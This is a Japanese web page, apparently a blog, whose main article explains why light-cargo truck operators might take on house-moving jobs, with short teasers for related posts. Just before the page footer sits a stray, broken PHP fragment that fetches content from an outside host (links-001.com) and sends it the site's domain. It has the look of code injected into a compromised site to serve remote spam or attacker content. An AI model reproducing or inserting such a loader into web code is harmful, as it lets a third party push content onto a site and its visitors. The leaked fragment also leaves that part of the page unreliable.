前へ
次へ

軽貨物の運送業者が引越しの荷物の運送を引き受ける際の注意点

軽貨物のドライバーの求人に引越し業務が記載されるなど、業務の一つとして軽貨物による引越し業務は認識さ

more

引越しを安心して依頼できる軽貨物の運送業者の選び方

軽貨物の運送業者の中には引越しの荷物を運送してくれるところがあります。運べる荷物の量は少ないですが、

more

軽貨物の運送で高単価な仕事

軽貨物の運送業者として軽貨物による配送を仲介するマッチングサイトで依頼を探していると、依頼によって報

more

軽貨物の運送業者が引越しの荷物を運ぶ依頼を引き受けるメリット

軽貨物の運送業者の業務内容としてメインとなるのが、軽貨物を使用した特定のエリア内での宅配物の運送や企業間のルート配送です。しかしこういった軽貨物の運送の依頼は多数あるため軽貨物のマッチングサービスなどで依頼を探しても思うように案件が取れなかったりすることもあります。そういった時に加えておいても良いのが軽貨物による引越しの荷物の運送です。通常の軽貨物による軽貨物の運送の求人内容にも引越し業務が仕事内容として掲載されていることは珍しくありませんし、宅配やルート配送ほどではないものの価格を抑えられるといった点から単身者向けの引越しへと利用されるなど一定数の需要がある業務でもあります。そのため軽貨物による運送の仕事の依頼可能な案件に引越し業務を加えておくことはメリットがありそうです。軽貨物による引越しの荷物の依頼を引き受けることのメリットとしては副業の1つにできる可能性があるということです。12月などの繁忙期が過ぎてしまうと軽貨物の運送の案件が減ってしまうことがあります。引越しの繁忙期は新年度が始まる2〜3月の間や10月前後と案件が減りやすい時期でもあります。また引越しが集中する時期のため中には引越し業者から依頼を断られてしまい、軽貨物の運送業者へと依頼が来るといったケースもあります。こういった面からも軽貨物による引っ越しの荷物の運送は臨時収入としておすすめの案件ともいえそうです。それ以外にも軽貨物にて宅配便やルート配送を行う場合運送業務を行う場合破損や荷崩れなどを防ぐために積み込み方などのノウハウを身につけているというドライバーも多いと思います。これらの技術は引越しの荷物の積み込みにも応用することができるため、自分の培ってきた技術や専門知識を活かしたいという場合にも活用できそうです。ただ通常の引っ越し会社と比較をすると技術面では劣ることは否めません。そのため軽貨物の引越しの荷物の運送にて高い報酬を得ることは難しそうです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top